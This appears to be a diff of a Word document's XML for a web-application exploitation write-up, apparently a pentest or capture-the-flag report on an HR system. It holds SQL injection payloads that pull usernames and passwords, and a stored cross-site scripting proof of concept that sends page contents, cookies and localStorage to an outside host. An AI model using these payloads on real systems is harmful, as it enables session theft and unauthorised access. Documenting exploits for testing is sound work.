               <w:t xml:space="preserve"> </w:t>
@@ -10308,7 +11252,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -10316,21 +11262,27 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>(username,1,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>)=BINARY '</w:t>
@@ -10338,7 +11290,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
@@ -10346,7 +11300,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>' and roles=BINARY 'HR admin' limit 1 --+</w:t>
@@ -10382,7 +11338,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -10402,18 +11358,22 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -10422,7 +11382,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,username</w:t>
@@ -10430,7 +11392,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,password</w:t>
@@ -10438,7 +11402,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from Users having </w:t>
@@ -10446,7 +11412,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -10454,7 +11422,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
@@ -10462,7 +11432,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>Wear_some_glasses_minions</w:t>
@@ -10470,15 +11442,29 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!}' and username=BINARY '</w:t>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">!}' and </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>username=BINARY '</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
@@ -10486,7 +11472,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>' limit 1 --+</w:t>
@@ -10508,6 +11496,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>L</w:t>
             </w:r>
             <w:r>
@@ -10574,6 +11563,7 @@
                 <w:noProof/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:drawing>
                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434C28DB" wp14:editId="3DB84674">
                   <wp:extent cx="2532380" cy="664845"/>
@@ -10828,6 +11818,7 @@
       <w:pPr>
         <w:jc w:val="right"/>
         <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
@@ -10841,9 +11832,2887 @@
         </w:r>
       </w:hyperlink>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:u w:val="none"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
+      <w:bookmarkEnd w:id="50"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ection</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2 – stored cross-site scripting exploitation walkthrough</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="51" w:name="_Exploitation_1"/>
+      <w:bookmarkEnd w:id="51"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Exploitation 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> following steps provide a proof of concept on how the stored cross-site scripting vulnerability is exploited to make an unauthorised user passing the probation on behalf of the HR team member.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="688"/>
+        <w:gridCol w:w="5500"/>
+        <w:gridCol w:w="2831"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="573" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tep</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4809" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Payload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3637" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>E</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xplanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="573" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4809" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var serializer = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLSerializer</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>dom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>serializer.serializeToString</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>document.cookie</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "&amp;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>localStorage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>JSON.stringify</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>localStorage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
